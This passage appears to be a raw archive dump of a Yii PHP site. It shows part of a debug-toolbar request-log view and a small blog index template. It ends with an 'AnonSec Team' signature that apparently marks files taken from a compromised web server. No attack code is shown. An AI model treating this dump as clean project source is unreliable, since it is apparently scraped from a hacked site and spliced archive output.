        if (!empty($vals['statusCode'])) {
            $codes[] = $vals['statusCode'];
        }
    }
    $codes = array_unique($codes, SORT_NUMERIC);
    $statusCodes = !empty($codes) ? array_combine($codes, $codes) : null;

    echo GridView::widget([
        'dataProvider' => $dataProvider,
        'filterModel' => $searchModel,
        'rowOptions' => function ($model, $key, $index, $grid) use ($searchModel) {
            $dbPanel = $this->context->module->panels['db'];

            if ($searchModel->isCodeCritical($model['statusCode']) || $dbPanel->isQueryCountCritical($model['sqlCount'])) {
                return ['class'=>'danger'];
            } else {
                return [];
            }
        },
        'columns' => [
            ['class' => 'yii\grid\SerialColumn'],
            [
                'attribute' => 'tag',
                'value' => function ($data) {
                    return Html::a($data['tag'], ['view', 'tag' => $data['tag']]);
                },
                'format' => 'html',
            ],
            [
                'attribute' => 'time',
                'value' => function ($data) {
                    return '<span class="nowrap">' . Yii::$app->formatter->asDatetime($data['time'], 'yyyy-MM-dd HH:mm:ss') . '</span>';
                },
                'format' => 'html',
            ],
            'ip',
            [
                'attribute' => 'sqlCount',
                'label' => 'Query Count',
                'value' => function ($data) {
                    $dbPanel = $this->context->module->panels['db'];

                    if ($dbPanel->isQueryCountCritical($data['sqlCount'])) {

                        $content = Html::tag('b', $data['sqlCount']) . ' ' . Html::tag('span', '', ['class' => 'glyphicon glyphicon-exclamation-sign']);

                        return Html::a($content, ['view', 'panel' => 'db', 'tag' => $data['tag']], [
                            'title' => 'Too many queries. Allowed count is ' . $dbPanel->criticalQueryThreshold,
                        ]);

                    } else {
                        return $data['sqlCount'];
                    }
                },
                'format' => 'html',
            ],
            [
                'attribute' => 'mailCount',
                'visible' => isset($this->context->module->panels['mail']),
            ],
            [
                'attribute' => 'method',
                'filter' => ['get' => 'GET', 'post' => 'POST', 'delete' => 'DELETE', 'put' => 'PUT', 'head' => 'HEAD']
            ],
            [
                'attribute'=>'ajax',
                'value' => function ($data) {
                    return $data['ajax'] ? 'Yes' : 'No';
                },
                'filter' => ['No', 'Yes'],
            ],
            [
                'attribute' => 'url',
                'label' => 'URL',
            ],
            [
                'attribute' => 'statusCode',
                'value' => function ($data) {
                    $statusCode = $data['statusCode'];
                    if ($statusCode === null) {
                        $statusCode = 200;
                    }
                    if ($statusCode >= 200 && $statusCode < 300) {
                        $class = 'label-success';
                    } elseif ($statusCode >= 300 && $statusCode < 400) {
                        $class = 'label-info';
                    } else {
                        $class = 'label-danger';
                    }
                    return "<span class=\"label {$class}\">$statusCode</span>";
                },
                'format' => 'raw',
                'filter' => $statusCodes,
                'label' => 'Status code'
            ],
        ],
    ]);

} else {
    echo "<div class='alert alert-warning'>No data available. Panel <code>db</code> or <code>request</code> not found.</div>";
}

?>
        </div>
    </div>
</div>
<script type="text/javascript">
    if (!window.frameElement) {
        document.querySelector('#yii-debug-toolbar').style.display = 'block';
    }
</script>
var/www/vhosts/oinversion.com/httpdocs/frontend/themes/oinversion/views/blog/index.php000064400000000206151703463630025513 0ustar00<?php
use yii\helpers\Html;
use yii\widgets\LinkPager;

?>

<?= $this->render('_posts', ['blogPostProvider'=> $blogPostProvider] ); ?>

Anon7 - 2022
AnonSec Team